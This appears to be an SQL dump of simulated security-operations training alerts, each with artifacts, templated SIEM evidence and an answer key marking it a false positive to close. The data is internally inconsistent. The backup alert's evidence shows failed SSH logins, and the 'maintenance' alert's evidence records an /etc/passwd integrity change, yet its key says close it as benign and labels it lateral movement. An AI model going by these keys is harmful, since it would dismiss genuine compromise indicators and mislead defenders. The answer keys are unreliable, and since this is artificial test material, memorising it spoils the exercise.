(1807, 'Scheduled Data Sync Detected', 'low', 'Splunk', 'A data synchronization task was detected between internal databases. This is part of regular data management operations.', 'Data Transfer', 'T1029', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T12:05:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.10\",\"dst_ip\":\"10.0.0.20\",\"username\":\"db_sync_user\",\"hostname\":\"DB-SYNC-01\",\"command_line\":\"pg_dump -h 10.0.0.20 -U db_sync_user -d production_db > backup.sql\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP used for data synchronization\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"pg_dump -h 10.0.0.20 -U db_sync_user -d production_db > backup.sql\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Authorized database synchronization command\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_transfer\",\"analysis_notes\":\"This alert was generated by a scheduled data synchronization task and is not indicative of an attack.\"}', 'Intermediate', 'SIEM', 5, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.328Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T12:05:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.10\\\",\\\"dst_ip\\\":\\\"10.0.0.20\\\",\\\"username\\\":\\\"db_sync_user\\\",\\\"hostname\\\":\\\"DB-SYNC-01\\\",\\\"command_line\\\":\\\"pg_dump -h 10.0.0.20 -U db_sync_user -d production_db > 
backup.sql\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.328Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T12:05:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.10\\\",\\\"dst_ip\\\":\\\"10.0.0.20\\\",\\\"username\\\":\\\"db_sync_user\\\",\\\"hostname\\\":\\\"DB-SYNC-01\\\",\\\"command_line\\\":\\\"pg_dump -h 10.0.0.20 -U db_sync_user -d production_db > backup.sql\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.328Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T12:05:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.10\\\",\\\"dst_ip\\\":\\\"10.0.0.20\\\",\\\"username\\\":\\\"db_sync_user\\\",\\\"hostname\\\":\\\"DB-SYNC-01\\\",\\\"command_line\\\":\\\"pg_dump -h 10.0.0.20 -U db_sync_user -d production_db > backup.sql\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.328Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T12:05:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.10\\\",\\\"dst_ip\\\":\\\"10.0.0.20\\\",\\\"username\\\":\\\"db_sync_user\\\",\\\"hostname\\\":\\\"DB-SYNC-01\\\",\\\"command_line\\\":\\\"pg_dump -h 10.0.0.20 -U db_sync_user -d production_db > backup.sql\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.328Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T12:05:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.10\\\",\\\"dst_ip\\\":\\\"10.0.0.20\\\",\\\"username\\\":\\\"db_sync_user\\\",\\\"hostname\\\":\\\"DB-SYNC-01\\\",\\\"command_line\\\":\\\"pg_dump -h 10.0.0.20 -U db_sync_user -d production_db > backup.sql\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1808, 'Routine IT Vulnerability Scanning Detected as Brute Force Attack', 'low', 'Wazuh', 'A series of failed login attempts were detected originating from an internal scanner IP. This activity was identified as part of a routine vulnerability scan.', 'Brute Force', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T13:45:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"192.168.1.100\",\"username\":\"admin\",\"hostname\":\"internal-scanner\",\"failed_attempts\":20}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP used for routine vulnerability scans\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The source IP belongs to an internal scanner used by IT for routine vulnerability assessments, making the alert a false positive.\"}', 'Intermediate', 'SIEM', 5, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.329Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T13:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"internal-scanner\\\",\\\"failed_attempts\\\":20}\"},{\"timestamp\":\"2026-03-16T03:04:28.329Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T13:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"internal-scanner\\\",\\\"failed_attempts\\\":20}\"},{\"timestamp\":\"2026-03-16T03:03:28.329Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T13:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"internal-scanner\\\",\\\"failed_attempts\\\":20}\"},{\"timestamp\":\"2026-03-16T03:02:28.329Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T13:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"internal-scanner\\\",\\\"failed_attempts\\\":20}\"},{\"timestamp\":\"2026-03-16T03:01:28.329Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T13:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"internal-scanner\\\",\\\"failed_attempts\\\":20}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1809, 'Authorized Administrative Backups Detected as Data Exfiltration', 'medium', 'Splunk', 'Data transfers to a backup server were flagged as potential data exfiltration. These transfers are part of scheduled administrative backups.', 'Data Exfiltration', 'T1020', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:30:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.50\",\"dst_ip\":\"10.0.0.5\",\"username\":\"backup_admin\",\"hostname\":\"backup-server\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"IP is part of authorized backup operations\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Authorized backup server destination\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The activity is consistent with routine backup operations, hence categorized as a false positive.\"}', 'Intermediate', 'SIEM', 5, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.331Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T08:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"backup-server\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.331Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 
192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T08:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"backup-server\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.331Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T08:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"backup-server\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.331Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T08:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"backup-server\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.331Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T08:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"backup-server\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1810, 'Benign System Health Check Detected as Malicious Execution', 'low', 'Elastic SIEM', 'A system health check process was mistakenly flagged as malicious due to the execution of a common diagnostic tool.', 'Malware', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:00:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.20\",\"dst_ip\":\"\",\"username\":\"sysadmin\",\"hostname\":\"diagnostic-tool\",\"command_line\":\"C:\\\\Windows\\\\System32\\\\diagnostic.exe\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"C:\\\\Windows\\\\System32\\\\diagnostic.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Recognized system health diagnostic tool\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"This process execution is part of a routine system health check and is not malicious.\"}', 'Intermediate', 'SIEM', 5, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.332Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T11:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"sysadmin\\\",\\\"hostname\\\":\\\"diagnostic-tool\\\",\\\"command_line\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\diagnostic.exe\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.332Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T11:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"sysadmin\\\",\\\"hostname\\\":\\\"diagnostic-tool\\\",\\\"command_line\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\diagnostic.exe\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.332Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T11:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"sysadmin\\\",\\\"hostname\\\":\\\"diagnostic-tool\\\",\\\"command_line\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\diagnostic.exe\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.332Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T11:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"sysadmin\\\",\\\"hostname\\\":\\\"diagnostic-tool\\\",\\\"command_line\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\diagnostic.exe\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.332Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T11:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"sysadmin\\\",\\\"hostname\\\":\\\"diagnostic-tool\\\",\\\"command_line\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\diagnostic.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 
0),
(1811, 'Misconfigured Legacy App Triggers Unauthorized Access Alert', 'medium', 'Azure Sentinel', 'An alert for unauthorized access was triggered by a legacy application due to misconfiguration, causing false login attempts.', 'Brute Force', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:15:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"192.168.1.30\",\"dst_ip\":\"192.168.1.40\",\"username\":\"legacy_app\",\"hostname\":\"legacy-server\",\"failed_attempts\":10}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.30\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal application with known misconfiguration issues\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The misconfiguration in a legacy application caused false login attempts, resulting in a false positive alert.\"}', 'Intermediate', 'SIEM', 5, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.334Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T14:15:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.30\\\",\\\"dst_ip\\\":\\\"192.168.1.40\\\",\\\"username\\\":\\\"legacy_app\\\",\\\"hostname\\\":\\\"legacy-server\\\",\\\"failed_attempts\\\":10}\"},{\"timestamp\":\"2026-03-16T03:04:28.334Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T14:15:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.30\\\",\\\"dst_ip\\\":\\\"192.168.1.40\\\",\\\"username\\\":\\\"legacy_app\\\",\\\"hostname\\\":\\\"legacy-server\\\",\\\"failed_attempts\\\":10}\"},{\"timestamp\":\"2026-03-16T03:03:28.334Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T14:15:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.30\\\",\\\"dst_ip\\\":\\\"192.168.1.40\\\",\\\"username\\\":\\\"legacy_app\\\",\\\"hostname\\\":\\\"legacy-server\\\",\\\"failed_attempts\\\":10}\"},{\"timestamp\":\"2026-03-16T03:02:28.334Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T14:15:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.30\\\",\\\"dst_ip\\\":\\\"192.168.1.40\\\",\\\"username\\\":\\\"legacy_app\\\",\\\"hostname\\\":\\\"legacy-server\\\",\\\"failed_attempts\\\":10}\"},{\"timestamp\":\"2026-03-16T03:01:28.334Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T14:15:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.30\\\",\\\"dst_ip\\\":\\\"192.168.1.40\\\",\\\"username\\\":\\\"legacy_app\\\",\\\"hostname\\\":\\\"legacy-server\\\",\\\"failed_attempts\\\":10}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1812, 'Scheduled Maintenance Activity Mistaken for Persistence Technique', 'low', 'Wazuh', 'Scheduled maintenance scripts were detected as persistence activities due to similarities in script execution patterns.', 'Persistence', 'T1053', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:50:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.60\",\"dst_ip\":\"\",\"username\":\"maintenance_user\",\"hostname\":\"maintenance-server\",\"command_line\":\"/usr/local/bin/maintenance_script.sh\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"/usr/local/bin/maintenance_script.sh\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Scheduled maintenance script execution\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The detected activity is a legitimate scheduled maintenance operation, not a persistence technique.\"}', 'Intermediate', 'SIEM', 5, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.335Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T09:50:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.60\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"maintenance_user\\\",\\\"hostname\\\":\\\"maintenance-server\\\",\\\"command_line\\\":\\\"/usr/local/bin/maintenance_script.sh\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.335Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. 
[Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T09:50:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.60\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"maintenance_user\\\",\\\"hostname\\\":\\\"maintenance-server\\\",\\\"command_line\\\":\\\"/usr/local/bin/maintenance_script.sh\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.335Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T09:50:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.60\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"maintenance_user\\\",\\\"hostname\\\":\\\"maintenance-server\\\",\\\"command_line\\\":\\\"/usr/local/bin/maintenance_script.sh\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.335Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T09:50:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.60\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"maintenance_user\\\",\\\"hostname\\\":\\\"maintenance-server\\\",\\\"command_line\\\":\\\"/usr/local/bin/maintenance_script.sh\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.335Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. 
[Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T09:50:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.60\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"maintenance_user\\\",\\\"hostname\\\":\\\"maintenance-server\\\",\\\"command_line\\\":\\\"/usr/local/bin/maintenance_script.sh\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(1813, 'Routine IT Vulnerability Scanning Detected', 'low', 'Splunk', 'A series of network scans were detected originating from a known internal IP range. These scans are part of routine IT security assessments.', 'Network Scan', 'T1046', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T02:15:23Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"192.168.1.200\",\"username\":\"it_admin\",\"hostname\":\"scan_host\",\"command_line\":\"nmap -sS -p 1-65535 192.168.1.200\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP used for routine scanning\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"nmap -sS -p 1-65535 192.168.1.200\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Legitimate network scan command for IT security assessment\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"network_scan\",\"analysis_notes\":\"Alert triggered by authorized IT scans. 
No malicious activity detected.\"}', 'Intermediate', 'SIEM', 5, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.336Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T02:15:23Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"192.168.1.200\\\",\\\"username\\\":\\\"it_admin\\\",\\\"hostname\\\":\\\"scan_host\\\",\\\"command_line\\\":\\\"nmap -sS -p 1-65535 192.168.1.200\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.336Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T02:15:23Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"192.168.1.200\\\",\\\"username\\\":\\\"it_admin\\\",\\\"hostname\\\":\\\"scan_host\\\",\\\"command_line\\\":\\\"nmap -sS -p 